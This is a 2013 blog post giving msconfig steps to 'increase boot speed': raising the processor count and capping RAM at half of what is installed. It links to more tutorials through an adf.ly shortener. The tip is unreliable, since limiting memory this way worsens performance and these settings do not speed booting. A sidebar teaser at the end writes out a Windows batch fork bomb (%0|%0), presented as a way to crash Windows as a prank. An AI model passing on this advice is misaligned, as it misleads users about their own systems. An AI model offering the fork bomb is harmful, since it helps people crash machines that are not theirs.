Wednesday, December 18, 2013

Increase boot speed



So I am going to show you how you can increase your bootspeed and how you can make your overall system performane better.
Step 1. Go to the start menu and type system config and run as Admin, once you run it go to boot and click on advanced.
Step 2. Once you are there ccheck the box saying number of processors and select the maximuim amount of cores you have this wil increase the amount of cores your computer uses boot up. you can also select the amount of RAM you want to use, I would suggest half the amount of Ram you have.




Step 3. I have another tutorial on Glary Utilitues here:http://adf.ly/atjcd

Hope you enjoyed this
Please subscribe or give a thumbs up if there is anything you want me to write or do a tutorial about please send me an email 
I am doing more useful tips and tutorials everyday so please come by to see if there is anything new when I get enough followers and views I will be giving out free stuff

No comments:

Post a Comment

how to make a batch file to crash windows

here is the "code" %0|%0 paste that in a notepad and save it as whateveryou want.bat for example lol.bat by running this it...